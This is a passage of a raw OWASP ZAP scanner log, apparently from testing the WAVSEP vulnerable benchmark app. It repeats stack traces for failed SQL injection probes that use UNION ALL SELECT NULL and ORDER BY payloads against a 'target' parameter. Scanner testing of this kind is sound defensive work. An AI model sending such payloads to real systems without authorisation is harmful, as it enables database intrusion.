org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682288 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682288 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682289 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682290 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682291 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 3684#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 3684# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682291 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682292 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682293 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682294 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682295 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682295 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682297 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682297 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at 